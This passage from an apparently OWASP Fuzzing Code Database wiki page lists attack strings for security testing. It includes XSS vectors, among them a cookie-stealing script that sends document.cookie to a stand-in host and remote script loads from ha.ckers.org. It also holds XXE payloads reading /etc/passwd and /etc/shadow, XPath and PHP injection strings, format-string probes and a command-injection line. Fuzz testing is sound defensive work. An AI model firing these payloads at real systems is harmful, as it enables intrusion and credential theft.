&amp;quot;&amp;amp;lt;SCRIPT&amp;amp;gt;document.write(&amp;quot;&amp;quot;&amp;amp;lt;SCRI&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;PT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://66.102.7.147/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://1113982867/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0x42.0x0000066.0x7.0x93/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0102.0146.0007.00000223/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;h\ntt\tp://6&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//www.google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//google&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.google.com./&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;javascript:document.location='http://www.google.com/'&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.gohttp://www.google.com/ogle.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;input type=&amp;quot;&amp;quot;image&amp;quot;&amp;quot; dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;bgsound src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;link rel=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; href=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;iframe src=&amp;quot;&amp;quot;vbscript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;livescript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;about:&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;meta http-equiv=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; content=&amp;quot;&amp;quot;0;url=javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;body onload=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;background-image: url(javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;width: expression(document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style type=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/style&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;object classid=&amp;quot;&amp;quot;clsid:...&amp;quot;&amp;quot; codebase=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style&amp;amp;gt;&amp;amp;lt;!--&amp;amp;lt;/style&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;![CDATA[&amp;amp;lt;!--]]&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;quot;&amp;quot;onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;amp;gt;&amp;quot;&amp;quot; onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div datafld=&amp;quot;&amp;quot;b&amp;quot;&amp;quot; dataformatas=&amp;quot;&amp;quot;html&amp;quot;&amp;quot; datasrc=&amp;quot;&amp;quot;#X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/div&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;javascript#document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;mocha:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt; [Mozilla]&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml id=&amp;quot;&amp;quot;X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;a&amp;amp;gt;&amp;amp;lt;b&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;;&amp;amp;lt;/b&amp;amp;gt;&amp;amp;lt;/a&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;[\xC0][\xBC]script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);[\xC0][\xBC]/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;quot;%3cscript%3ealert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);%3c/script%3e&amp;quot;&lt;br /&gt;
%3cscript%3ealert(document.cookie);%3c%2fscript%3e&lt;br /&gt;
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;amp;ltscript&amp;amp;amp;gtalert&lt;br /&gt;
&amp;amp;lt;xss&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert('WXSS')&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;/vulnerable&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javascript:alert(document.cookie)'&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(&amp;quot;WXSS&amp;quot;)&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=`javascript:alert(&amp;quot;&amp;quot;'WXSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javasc&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav	ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;%20&amp;amp;amp;#14;%20javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20DYNSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20LOWSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;!--&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;=&amp;amp;amp;{}&lt;br /&gt;
'';!--&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
count(/child::node())&lt;br /&gt;
x' or name()='username' or 'x'='y&lt;br /&gt;
&amp;amp;lt;name&amp;amp;gt;','')); phpinfo(); exit;/*&amp;amp;lt;/name&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;script&amp;amp;gt;var n=0;while(true){n++;}&amp;amp;lt;/script&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: 30 July 2007 - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Full List&lt;br /&gt;
# Format String tests to determine errors in variable handling&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] [[:User:Adam.muntner|'''Adam Muntner''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
